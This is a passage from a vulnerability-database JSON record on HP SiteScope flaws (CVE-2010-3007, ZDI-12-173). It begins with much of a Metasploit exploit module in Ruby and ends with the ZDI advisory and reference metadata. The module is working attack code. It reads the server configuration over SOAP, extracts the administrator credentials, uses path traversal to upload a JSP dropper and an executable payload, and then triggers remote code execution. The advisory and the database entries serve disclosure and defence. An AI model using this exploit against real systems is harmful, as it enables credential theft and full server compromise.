..\\\\#{@var_hexfile}.txt\")\n\t\t\tclient.shell_command_token(\"del ..\\\\#{@jsp_name}.jsp\")\n\t\tend\n\tend\n\n\tdef exploit\n\t\t@peer = \"#{rhost}:#{rport}\"\n\t\t@uri = target_uri.path\n\t\t@uri \u003c\u003c \u0027/\u0027 if @uri[-1,1] != \u0027/\u0027\n\n\t\t# Retrieve administrator credentials\n\t\tprint_status(\"#{@peer} - Retrieving HP SiteScope Configuration\")\n\t\tconf = access_configuration\n\n\t\tif not conf or conf.empty?\n\t\t\tprint_error(\"#{@peer} - Failed to retrieve the HP SiteScope Configuration\")\n\t\t\treturn\n\t\tend\n\n\t\tprint_status(\"#{@peer} - Retrieving HP SiteScope administrator credentials\")\n\n\t\tadmin_data = conf.split(\"\\x03\\x5F\\x69\\x64\\x74\\x00\\x0D\\x61\\x64\\x6D\\x69\\x6E\\x69\\x73\\x74\\x72\\x61\\x74\\x6F\\x72\\x74\\x00\")[1]\n\n\t\tif not admin_data or admin_data.empty?\n\t\t\tprint_error(\"#{@peer} - Error retrieving the HP SiteScope administrator credentials\")\n\t\t\treturn\n\t\tend\n\n\t\tadmin_password = admin_data.split(/\\x09_passwordt\\x00/)[1]\n\n\t\tif not admin_password or admin_password.empty?\n\t\t\tprint_error(\"#{@peer} - Error retrieving the HP SiteScope administrator credentials\")\n\t\t\treturn\n\t\tend\n\n\t\tpassword_length = admin_password.unpack(\"C\").first\n\t\tif password_length \u003e 0\n\t\t\tpassword = admin_password[1, password_length]\n\t\telse\n\t\t\tpassword = \"\"\n\t\tend\n\n\t\tadmin_user_type, admin_user = admin_password.split(/\\x06(_login[q|t])\\x00/)[1, 2]\n\n\t\tif not admin_user_type or admin_user_type.empty?\n\t\t\tprint_error(\"#{@peer} - Error retrieving the HP SiteScope administrator credentials\")\n\t\t\treturn\n\t\tend\n\n\t\tif admin_user_type == \"_logint\"\n\t\t\tif not admin_user or admin_user.empty?\n\t\t\t\tprint_error(\"#{@peer} - Error retrieving the HP SiteScope administrator credentials\")\n\t\t\t\treturn\n\t\t\tend\n\t\t\tuser_length = admin_user.unpack(\"C\").first\n\t\telse\n\t\t\tuser_length = 0\n\t\tend\n\n\t\tif user_length \u003e 0\n\t\t\tuser = admin_user[1, user_length]\n\t\telse\n\t\t\tuser = \"\"\n\t\tend\n\n\t\t# Generate an initial JSESSIONID\n\t\tprint_status(\"#{@peer} - Retrieving an initial JSESSIONID\")\n\t\tres = send_request_cgi(\n\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}servlet/Main\",\n\t\t\t\u0027method\u0027 =\u003e \u0027POST\u0027,\n\t\t)\n\n\t\tif res and res.code == 200 and res.headers[\u0027Set-Cookie\u0027] =~ /JSESSIONID=([0-9A-F]*);/\n\t\t\tsession_id = $1\n\t\telse\n\t\t\tprint_error(\"#{@peer} - Retrieve of initial JSESSIONID failed\")\n\t\t\treturn\n\t\tend\n\n\t\t# Authenticate\n\t\tlogin_data = \"j_username=#{user}\u0026j_password=#{password}\"\n\n\t\tprint_status(\"#{@peer} - Authenticating on HP SiteScope Configuration\")\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}j_security_check\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027POST\u0027,\n\t\t\t\t\u0027data\u0027 =\u003e login_data,\n\t\t\t\t\u0027ctype\u0027 =\u003e \"application/x-www-form-urlencoded\",\n\t\t\t\t\u0027headers\u0027 =\u003e\n\t\t\t\t\t{\n\t\t\t\t\t\t\u0027Cookie\u0027 =\u003e \"JSESSIONID=#{session_id}\",\n\t\t\t\t\t}\n\t\t\t})\n\n\t\tif res and res.code == 302 and res.headers[\u0027Set-Cookie\u0027] =~ /JSESSIONID=([0-9A-F]*);/\n\t\t\tsession_id = $1\n\t\t\tredirect = URI(res.headers[\u0027Location\u0027]).path\n\t\telse\n\t\t\tprint_error(\"#{@peer} - Authentication on SiteScope failed\")\n\t\t\treturn\n\t\tend\n\n\t\t# Follow redirection to complete authentication process\n\t\tprint_status(\"#{@peer} - Following redirection to finish authentication\")\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e redirect,\n\t\t\t\t\u0027method\u0027 =\u003e \u0027GET\u0027,\n\t\t\t\t\u0027headers\u0027 =\u003e\n\t\t\t\t\t{\n\t\t\t\t\t\t\u0027Cookie\u0027 =\u003e \"JSESSIONID=#{session_id}\",\n\t\t\t\t\t}\n\t\t\t})\n\n\t\tif not res or res.code != 200\n\t\t\tprint_error(\"#{@peer} - Authentication on SiteScope failed\")\n\t\t\treturn\n\t\tend\n\n\t\t# Upload the JSP and the raw payload\n\t\t@jsp_name = rand_text_alphanumeric(8+rand(8))\n\n\t\t# begin \u003cpayload\u003e.jsp\n\t\tvar_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_exepath = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_data = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_bytes = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_counter = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_char1 = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_char2 = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_comb = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_exe = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\t@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_proc = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_fperm = Rex::Text.rand_text_alpha(rand(8)+8)\n\t\tvar_fdel = Rex::Text.rand_text_alpha(rand(8)+8)\n\n\t\tjspraw = \"\u003c%@ page import=\\\"java.io.*\\\" %\u003e\\n\"\n\t\tjspraw \u003c\u003c \"\u003c%\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_hexpath} = application.getRealPath(\\\"/\\\") + \\\"/#{@var_hexfile}.txt\\\";\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_exepath} = System.getProperty(\\\"java.io.tmpdir\\\") + \\\"/#{var_exe}\\\";\\n\"\n\t\tjspraw \u003c\u003c \"String #{var_data} = \\\"\\\";\\n\"\n\n\t\tjspraw \u003c\u003c \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") != -1){\\n\"\n\t\tjspraw \u003c\u003c \"#{var_exepath} = #{var_exepath}.concat(\\\".exe\\\");\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\\n\"\n\t\tjspraw \u003c\u003c \"FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\\n\"\n\n\t\tjspraw \u003c\u003c \"int #{var_numbytes} = #{var_inputstream}.available();\\n\"\n\t\tjspraw \u003c\u003c \"byte #{var_bytearray}[] = new byte[#{var_numbytes}];\\n\"\n\t\tjspraw \u003c\u003c \"#{var_inputstream}.read(#{var_bytearray});\\n\"\n\t\tjspraw \u003c\u003c \"#{var_inputstream}.close();\\n\"\n\n\t\tjspraw \u003c\u003c \"byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\\n\"\n\t\tjspraw \u003c\u003c \"for (int #{var_counter} = 0; #{var_counter} \u003c #{var_numbytes}; #{var_counter} += 2)\\n\"\n\t\tjspraw \u003c\u003c \"{\\n\"\n\t\tjspraw \u003c\u003c \"char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\\n\"\n\t\tjspraw \u003c\u003c \"char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\\n\"\n\t\tjspraw \u003c\u003c \"int #{var_comb} = Character.digit(#{var_char1}, 16) \u0026 0xff;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_comb} \u003c\u003c= 4;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_comb} += Character.digit(#{var_char2}, 16) \u0026 0xff;\\n\"\n\t\tjspraw \u003c\u003c \"#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"#{var_outputstream}.write(#{var_bytes});\\n\"\n\t\tjspraw \u003c\u003c \"#{var_outputstream}.close();\\n\"\n\n\t\tjspraw \u003c\u003c \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") == -1){\\n\"\n\t\tjspraw \u003c\u003c \"String[] #{var_fperm} = new String[3];\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[0] = \\\"chmod\\\";\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[1] = \\\"+x\\\";\\n\"\n\t\tjspraw \u003c\u003c \"#{var_fperm}[2] = #{var_exepath};\\n\"\n\t\tjspraw \u003c\u003c \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\\n\"\n\t\tjspraw \u003c\u003c \"if (#{var_proc}.waitFor() == 0) {\\n\"\n\t\tjspraw \u003c\u003c \"#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\t\t# Linux and other UNICES allow removing files while they are in use... \n\t\tjspraw \u003c\u003c \"File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\\n\"\n\t\tjspraw \u003c\u003c \"} else {\\n\"\n\t\t# Windows does not .. \n\t\tjspraw \u003c\u003c \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\"\n\t\tjspraw \u003c\u003c \"}\\n\"\n\n\t\tjspraw \u003c\u003c \"%\u003e\\n\"\n\n\t\t# Specify the payload in hex as an extra file.. \n\t\tpayload_hex = payload.encoded_exe.unpack(\u0027H*\u0027)[0]\n\n\t\tpost_data = Rex::MIME::Message.new\n\t\tpost_data.add_part(payload_hex, \"application/octet-stream\", nil, \"form-data; name=\\\"#{rand_text_alpha(4)}\\\"; filename=\\\"#{rand_text_alpha(4)}.png\\\"\")\n\n\t\tprint_status(\"#{@peer} - Uploading the payload\")\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler\u0026UploadFilesHandler.file.name=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\#{@var_hexfile}.txt\u0026UploadFilesHandler.ovveride=true\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027POST\u0027,\n\t\t\t\t\u0027data\u0027 =\u003e post_data.to_s,\n\t\t\t\t\u0027ctype\u0027 =\u003e \"multipart/form-data; boundary=#{post_data.bound}\",\n\t\t\t\t\u0027headers\u0027 =\u003e\n\t\t\t\t\t{\n\t\t\t\t\t\t\u0027Cookie\u0027 =\u003e \"JSESSIONID=#{session_id}\",\n\t\t\t\t\t}\n\t\t\t})\n\n\t\tif res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/\n\t\t\tpath = $1\n\t\t\tprint_good(\"#{@peer} - Payload successfully uploaded to #{path}\")\n\t\telse\n\t\t\tprint_error(\"#{@peer} - Error uploading the Payload\")\n\t\t\treturn\n\t\tend\n\n\t\tpost_data = Rex::MIME::Message.new\n\t\tpost_data.add_part(jspraw, \"application/octet-stream\", nil, \"form-data; name=\\\"#{rand_text_alpha(4)}\\\"; filename=\\\"#{rand_text_alpha(4)}.png\\\"\")\n\n\t\tprint_status(\"#{@peer} - Uploading the JSP\")\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler\u0026UploadFilesHandler.file.name=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\#{@jsp_name}.jsp\u0026UploadFilesHandler.ovveride=true\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027POST\u0027,\n\t\t\t\t\u0027data\u0027 =\u003e post_data.to_s,\n\t\t\t\t\u0027ctype\u0027 =\u003e \"multipart/form-data; boundary=#{post_data.bound}\",\n\t\t\t\t\u0027headers\u0027 =\u003e\n\t\t\t\t\t{\n\t\t\t\t\t\t\u0027Cookie\u0027 =\u003e \"JSESSIONID=#{session_id}\",\n\t\t\t\t\t}\n\t\t\t})\n\n\t\tif res and res.code == 200 and res.body =~ /file: (.*) uploaded succesfuly to server/\n\t\t\tpath = $1\n\t\t\tprint_good(\"#{@peer} - JSP successfully uploaded to #{path}\")\n\t\telse\n\t\t\tprint_error(\"#{@peer} - Error uploading the JSP\")\n\t\t\treturn\n\t\tend\n\n\t\tprint_status(\"Triggering payload at \u0027#{@uri}#{@jsp_name}.jsp\u0027 ...\")\n\t\tsend_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}#{@jsp_name}.jsp\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027GET\u0027,\n\t\t\t\t\u0027headers\u0027 =\u003e\n\t\t\t\t\t{\n\t\t\t\t\t\t\u0027Cookie\u0027 =\u003e \"JSESSIONID=#{session_id}\",\n\t\t\t\t\t}\n\t\t\t})\n\tend\n\n\tdef access_configuration\n\n\t\tdata = \"\u003c?xml version=\u00271.0\u0027 encoding=\u0027UTF-8\u0027?\u003e\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"\u003cwsns0:Envelope\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"xmlns:wsns1=\u0027http://www.w3.org/2001/XMLSchema-instance\u0027\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"xmlns:xsd=\u0027http://www.w3.org/2001/XMLSchema\u0027\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"xmlns:wsns0=\u0027http://schemas.xmlsoap.org/soap/envelope/\u0027\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"\u003e\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"\u003cwsns0:Body\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"wsns0:encodingStyle=\u0027http://schemas.xmlsoap.org/soap/encoding/\u0027\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"\u003e\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"\u003cimpl:getSiteScopeConfiguration\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"xmlns:impl=\u0027http://Api.freshtech.COM\u0027\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"\u003e\u003c/impl:getSiteScopeConfiguration\u003e\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"\u003c/wsns0:Body\u003e\" + \"\\r\\n\"\n\t\tdata \u003c\u003c \"\u003c/wsns0:Envelope\u003e\"\n\n\t\tres = send_request_cgi({\n\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}services/APISiteScopeImpl\",\n\t\t\t\u0027method\u0027 =\u003e \u0027POST\u0027,\n\t\t\t\u0027ctype\u0027 =\u003e \u0027text/xml; charset=UTF-8\u0027,\n\t\t\t\u0027data\u0027 =\u003e data,\n\t\t\t\u0027headers\u0027 =\u003e {\n\t\t\t\t\u0027SOAPAction\u0027 =\u003e \u0027\"\"\u0027,\n\t\t\t}})\n\n\t\tif res and res.code == 200\n\n\t\t\tif res.headers[\u0027Content-Type\u0027] =~ /boundary=\"(.*)\"/\n\t\t\t\tboundary = $1\n\t\t\tend\n\t\t\tif not boundary or boundary.empty?\n\t\t\t\treturn nil\n\t\t\tend\n\n\t\t\tif res.body =~ /getSiteScopeConfigurationReturn href=\"cid:([A-F0-9]*)\"/\n\t\t\t\tcid = $1\n\t\t\tend\n\t\t\tif not cid or cid.empty?\n\t\t\t\treturn nil\n\t\t\tend\n\n\t\t\tif res.body =~ /#{cid}\u003e\\r\\n\\r\\n(.*)\\r\\n--#{boundary}/m\n\t\t\t\tloot = Rex::Text.ungzip($1)\n\t\t\tend\n\t\t\tif not loot or loot.empty?\n\t\t\t\treturn nil\n\t\t\tend\n\n\t\t\treturn loot\n\t\tend\n\n\t\treturn nil\n\tend\n\nend\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nZDI-12-173 : (0Day) HP SiteScope SOAP Call getSiteScopeConfiguration Remote\nCode Execution Vulnerability\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-173\nAugust 29, 2012\n\n- -- CVE ID:\n\n\n- -- CVSS:\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\n\n- -- Affected Vendors:\nHewlett-Packard\n\n- -- Affected Products:\nHewlett-Packard SiteScope\n\n- -- TippingPoint(TM) IPS Customer Protection:\nTippingPoint IPS customers have been protected against this\nvulnerability by Digital Vaccine protection filter ID 12484. Authentication is not required to\nexploit this vulnerability. \n\n- -- Vendor Response:\n\n\n- -- Mitigation:\nGiven the stated purpose of SiteScope, and the nature of the vulnerability,\nthe only salient mitigation strategy is to restrict interaction with the\nservice to trusted machines. Only the clients and servers that have a\nlegitimate procedural relationship with the HP SiteScope service should be\npermitted to communicate with it. This could be accomplished in a number of\nways, most notably with firewall rules/whitelisting. These features are\navailable in the native Windows Firewall, as described in\nhttp://technet.microsoft.com/en-us/library/cc725770%28WS.10%29.aspx and\nnumerous other Microsoft Knowledge Base articles. \n\n\n- -- Disclosure Timeline:\n2011-12-22 - Vulnerability reported to vendor\n2012-08-29 - 0Day advisory released in accordance with the ZDI 180 day\ndeadline policy\n\n- -- Credit:\nThis vulnerability was discovered by:\n* Andrea Micalizzi aka rgod\n\n- -- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. TippingPoint does not re-sell the vulnerability details or any\nexploit code. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-3007"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003000"
},
{
"db": "ZDI",
"id": "ZDI-10-174"
},
{
"db": "ZDI",
"id": "ZDI-12-173"
},
{
"db": "CNVD",
"id": "CNVD-2010-1923"
},
{
"db": "BID",
"id": "43105"
},
{
"db": "PACKETSTORM",
"id": "93678"
},
{
"db": "PACKETSTORM",
"id": "93742"
},
{
"db": "PACKETSTORM",
"id": "93817"
},
{
"db": "PACKETSTORM",
"id": "116276"
},
{
"db": "PACKETSTORM",
"id": "116000"
}
],
"trust": 4.14
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2010-3007",
"trust": 4.2
},
{
"db": "ZDI",
"id": "ZDI-10-174",
"trust": 0.9
},
{
"db": "ZDI",
"id": "ZDI-12-173",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003000",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-581",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1461",
"trust": 0.7
},
{
"db": "SECUNIA",
"id": "41361",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2010-1923",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201009-078",
"trust": 0.6
},
{
"db": "BID",
"id": "43105",
"trust": 0.3
},
{
"db": "PACKETSTORM",
"id": "93678",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "93742",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "93817",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "116276",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "116000",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-174"
},
{
"db": "ZDI",
"id": "ZDI-12-173"
},
{
"db": "CNVD",
"id": "CNVD-2010-1923"
},
{
"db": "BID",
"id": "43105"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003000"
},
{
"db": "PACKETSTORM",
"id": "93678"
},
{
"db": "PACKETSTORM",
"id": "93742"
},
{
"db": "PACKETSTORM",
"id": "93817"
},
{
"db": "PACKETSTORM",
"id": "116276"
},
{
"db": "PACKETSTORM",
"id": "116000"
},
{
"db": "NVD",
"id": "CVE-2010-3007"
},
{
"db": "CNNVD",
"id": "CNNVD-201009-078"
}
]
},
"id": "VAR-201009-0282",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1923"
}
],
"trust": 0.89166666
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-1923"
}
]
},
"last_update_date": "2023-12-18T13:58:00.474000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "HPSBMA02576 SSRT090231",
"trust": 1.5,
"url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c02498535"
},
{
"title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline.-- Mitigation:Given the stated purpose of SiteScope, and the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the HP SiteScope service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.",
"trust": 0.7,
"url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx"
},
{
"title": "Patch for HP Data Protector Express Privilege Escalation Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/969"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-174"
},
{
"db": "ZDI",
"id": "ZDI-12-173"
},
{
"db": "CNVD",
"id": "CNVD-2010-1923"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003000"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2010-3007"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www13.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02498535"
},
{
"trust": 0.8,
"url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c02498535"
},
{
"trust": 0.8,
"url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3007"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-3007"
},
{
"trust": 0.7,
"url": "http://secunia.com/advisories/41361/"
},
{
"trust": 0.3,
"url": "http://www.hp.com/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-3007"
},
{
"trust": 0.2,
"url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
},
{
"trust": 0.2,
"url": "http://twitter.com/thezdi"
},
{
"trust": 0.2,
"url": "http://www.tippingpoint.com"
},
{
"trust": 0.2,
"url": "http://www.zerodayinitiative.com"
},
{
"trust": 0.1,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=41361"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/windows_insecure_library_loading/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/41361/#comments"
},
{
"trust": 0.1,
"url": "http://www.hp.com/support/bulletin56906"
},
{
"trust": 0.1,
"url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
},
{
"trust": 0.1,
"url": "http://www.hp.com/support/bulletin56936"
},
{
"trust": 0.1,
"url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
},
{
"trust": 0.1,
"url": "http://h30046.www3.hp.com/subsignin.php"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-10-174"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-10-174/\u0027"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\u0027\""
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/encoding/\u0027\""
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema-instance\u0027\""
},
{
"trust": 0.1,
"url": "http://api.freshtech.com\u0027\""
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema\u0027\""
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-173/\u0027"
},
{
"trust": 0.1,
"url": "http://metasploit.com/"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-173"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-10-174"
},
{
"db": "ZDI",
"id": "ZDI-12-173"
},
{
"db": "CNVD",
"id": "CNVD-2010-1923"
},
{
"db": "BID",
"id": "43105"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003000"
},
{
"db": "PACKETSTORM",
"id": "93678"
},
{
"db": "PACKETSTORM",
"id": "93742"
},
{
"db": "PACKETSTORM",
"id": "93817"
},
{
"db": "PACKETSTORM",
"id": "116276"
},
{
"db": "PACKETSTORM",
"id": "116000"
},
{
"db": "NVD",
"id": "CVE-2010-3007"
},
{
"db": "CNNVD",
"id": "CNNVD-201009-078"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-10-174"
},
{
"db": "ZDI",
"id": "ZDI-12-173"
},
{
"db": "CNVD",
"id": "CNVD-2010-1923"
},
{
"db": "BID",
"id": "43105"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-003000"
},
{
"db": "PACKETSTORM",
"id": "93678"
},
{
"db": "PACKETSTORM",
"id": "93742"
},
{
"db": "PACKETSTORM",
"id": "93817"
},
{
"db": "PACKETSTORM",
"id": "116276"
},
{
"db": "PACKETSTORM",
"id": "116000"
},
{
"db": "NVD",
"id": "CVE-2010-3007"
},
{
"db": "CNNVD",
"id": "CNNVD-201009-078"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-09-13T00:00:00",
"db": "ZDI",
"id": "ZDI-10-174"
},
{
"date": "2012-08-29T00:00:00",
"db": "ZDI",
"id": "ZDI-12-173"
},
{
"date": "2010-09-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1923"
},
{
"date": "2010-09-08T00:00:00",
"db": "BID",
"id": "43105"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-003000"
},
{
"date": "2010-09-11T08:41:11",
"db": "PACKETSTORM",
"id": "93678"
},
{
"date": "2010-09-11T19:23:10",
"db": "PACKETSTORM",
"id": "93742"
},
{
"date": "2010-09-14T01:25:18",
"db": "PACKETSTORM",
"id": "93817"
},
{
"date": "2012-09-06T02:03:26",
"db": "PACKETSTORM",
